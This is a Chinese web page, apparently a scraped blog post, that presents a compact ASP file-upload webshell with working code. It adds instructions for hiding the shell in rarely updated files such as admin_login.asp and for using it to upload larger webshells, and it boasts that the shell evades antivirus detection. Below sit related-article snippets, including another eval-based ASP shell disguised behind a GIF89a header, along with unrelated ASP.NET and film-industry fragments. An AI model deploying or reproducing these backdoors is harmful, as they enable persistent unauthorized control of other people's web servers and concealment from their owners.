一个ASP小马

<%if request.QueryString("action")="log" then

a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet="BIG5":i=h.Readtext:h.close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form>

<%end if%>

理由:能上传文件,简洁,体积小,不易发现。

使用:先用海阳或蓝屏用编辑功能将马编辑进一些不易更新的文件里,比如admin_login.asp.操作人家文件时只要在浏览器里输入admin_login.asp?action=log即可上传海阳或蓝屏,操作完后用蓝屏等自身删除功能将蓝屏删除。下回来时在用这常驻马上传海阳等。几乎用不被查杀。

时间: 2024-10-18 21:12:43

一个ASP小马的相关文章

一个ASP小马_木马相关

<%if request.QueryString("action")="log" thena=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g

几款双功能免杀超强版asp小马_安全教程

第一款: 复制代码 代码如下: GIF89a$ ;<hTml> <%eval request(chr(1))%> <% on error resume next testfile=Request.form("filepath") msg=Request.form("message") if Trim(request("filepath"))<>"" then set fs=server

小马奔腾:拍电影像赌博 不是下一个华谊兄弟

2009年,小马奔腾还是中国电影市场的一张新面孔.如果观众有看字幕的习惯,仅仅能从<机器侠>.<花木兰>.<无人区>等电影的出品方一栏中,找到小马奔腾的身影.就连它的创始人李明也自知,小马奔腾是一名电影市场的"后进生",发力晚,优质资源已经被先到者抢去不少. 但是小马奔腾也赶上了一个好时候,历史上没有任何时候能像现在这样,拍电影不差钱,所以,这名"后进生"在不到两年的时间内就交出几张颇为抢眼的成绩单.就拿今年情人节开始热播的电影&

怎样开始一个ASP网站的设计

设计 怎样开始一个ASP网站的设计 把这篇文章送给bluetooth:也作为给初学者的一个参考.文中谈到的只是我的个人看法和做法,如有不尽之处,请指正. 在开始设计一个ASP站点的时候,面对着一大堆的问题,到底要怎么样入手,才能让网站设计做到快,好,而且调试.更改,移植起来又方便呢?下面以留言本的设计为例子,谈谈站点的设计. (一)站点的功能 "磨刀不误砍柴工",先写出站点的功能,对以后的工作有很大的帮助.现在来设计一个留言本,功能如下: 1.单用户版.只有一个管理员,所有人都可以留言

神小马:seo无用与seo万能的极端论调分析

seo发展至今,可以说已经到了瓶颈期或者转型期,因为越来越多的站长有机会接触到seo,大家都能或多或少的了解并应用具体的seo手法,但此时也恰恰让越来越多的站长进入迷茫期,有两种极端论调较为盛行,有一些人持悲观论调,认为seo在现在的网站运营中已经没有效果了,无用了.而另一批人则非常豪爽的说,seo是万能的,只要学会seo,就能运营好网站并且能赚到钱.相信这两种人你都见过. 我们中国人是比较喜欢走极端的,这是由民族性格决定的,所以很明显上述的两种极端观点的出现,也就不奇怪了.但这样的观点对整个行

我的第一个Asp.Net程序

asp.net|程序 首先配制好自己的环境,要能够运行aspx程序.. 把下面这段保存成 hello.aspx <%@ Page Language="vb" Src="hellocodebehindvb.vb" Inherits="HelloWebFormVb"%> <HTML>    <HEAD>       <title>我的第一个Asp.Net程序</title>    </

sqlserver-求一个asp.net 的运用jquery ajax先数据库 添加数据的实例

问题描述 求一个asp.net 的运用jquery ajax先数据库 添加数据的实例 我在做一个asp.net技术做的问卷调查页面,需要把每一项的文本都添加到sqlserver数据库,大概20个选项,每个选项平均有100个字左右 我想问一下 这么大的数据量用jquery ajax 真的可以吗? 如果可以,请各位大神做个用jquery ajax做一个向数据库添加的实例给我,要注释齐全,代码规范的,谢谢! 解决方案 ajax和普通表单提交一样,你数据量大要使用post提交,没有什么ajax不可以的.

创建第一个ASP.NET应用程序(第1节)_实用技巧

这一节我们一起学习创建一个根据用户输入来显示相应的欢迎信息的页面,希望小伙伴们可以和我一起动手操作 学习内容:第一步,创建ASP.NET程序 1.运行 Visual Studio 2008.在菜单栏中选择"文件" →"新建" →"项目"命令,在弹出的"新建项目"的对话框中,选择左侧的"其他项目类型"树形目录中的"Visual Studio 解决方案"选项,在右边"Visual

怎么去面试一个asp.net开发人员?

问题描述 我呢是09年毕业的,一直都在做.net相关的开发.目前,大小混到了一个主管的位置,因为人事变动,公司需要招人.对于这方面呢,多少欠缺一些经验.目前我发现了一些问题,1.问理论相关的,大多是从书上或者网络上了解的,背出来了比如:我问,值类型和引用类型的区别,照本宣科似的背出来了(值类型被分配在栈,引用类型被分配在堆中,有程序猿分配--):getpost的区别,几乎答案全是,GET的URL会有长度上的限制,则POST的数据则可以非常大,POST比GET安全,因为数据在地址栏上不可见.能说出